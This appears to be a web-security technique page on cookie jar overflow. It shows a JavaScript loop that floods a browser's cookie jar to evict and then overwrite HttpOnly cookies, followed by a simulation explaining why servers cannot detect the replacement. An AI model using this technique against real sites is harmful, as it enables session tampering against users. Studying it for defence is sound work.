Cookie Jar Overflow

Browsers have a limit on the number of cookies they can store for a page. Once that limit is exceeded, older cookies are evicted to make room, which allows you to supplant cookies by adding new ones:

// Set many cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Third-party cookies pointing to a different domain will not be overwritten.

Cookie jar overflow can be used to overwrite HttpOnly cookies: you can remove them and then reset them with an arbitrary value.
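Why the HttpOnly flag does not protect against this, shown with a simplified model of the jar. This is an added example, not code from the original page: the `CookieJar` class, the `demo` function, the limit of 180 and the oldest-first eviction order are assumptions made for illustration, and real browsers use their own limits and eviction rules.

```javascript
// Simplified model of a browser cookie jar (added example; all names are hypothetical).
// Assumptions: one jar per site, a fixed limit, eviction of the oldest cookie first.
class CookieJar {
  constructor(limit) {
    this.limit = limit;
    this.cookies = new Map(); // a Map keeps insertion order: the first key is the oldest
  }

  // A Set-Cookie response header may create HttpOnly cookies.
  setFromServer(name, value, httpOnly = false) {
    this._store(name, { value, httpOnly });
  }

  // A document.cookie write cannot overwrite an existing HttpOnly cookie.
  setFromScript(name, value) {
    const existing = this.cookies.get(name);
    if (existing && existing.httpOnly) return false; // the write is ignored
    this._store(name, { value, httpOnly: false });
    return true;
  }

  _store(name, cookie) {
    this.cookies.set(name, cookie); // updating an existing name keeps its position
    while (this.cookies.size > this.limit) {
      const oldest = this.cookies.keys().next().value;
      this.cookies.delete(oldest); // eviction does not look at the HttpOnly flag
    }
  }

  // The value the server would receive in the Cookie request header.
  sentToServer(name) {
    const c = this.cookies.get(name);
    return c ? c.value : undefined;
  }
}

function demo(limit = 180) { // constructed limit, not a value taken from the page
  const jar = new CookieJar(limit);
  jar.setFromServer("session", "server-issued", true);
  const directWrite = jar.setFromScript("session", "script-value");
  for (let i = 0; i < limit; i++) jar.setFromScript(`cookie${i}`, String(i));
  const afterOverflow = jar.sentToServer("session");
  const secondWrite = jar.setFromScript("session", "script-value");
  return { directWrite, afterOverflow, secondWrite, final: jar.sentToServer("session") };
}
```

The Cookie request header carries only names and values, so the server cannot see that the replacement cookie lacks HttpOnly. A server that needs to trust the cookie has to validate the value itself.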
